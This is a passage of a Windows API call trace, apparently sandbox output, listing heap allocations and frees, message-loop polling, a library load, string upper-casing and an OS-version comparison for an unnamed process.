RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0259.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0259.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.981] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0259.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.982] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.982] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.983] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.983] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0259.984] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.985] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0259.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.986] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0259.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.987] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.988] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0259.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0259.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0259.989] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0259.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.990] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0259.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0259.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.990] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 1 [0259.990] TranslateMessage (lpMsg=0x8bf050) returned 0 [0259.990] DispatchMessageW (lpMsg=0x8bf050) returned 0x0 [0259.990] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0259.990] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0259.990] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0259.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 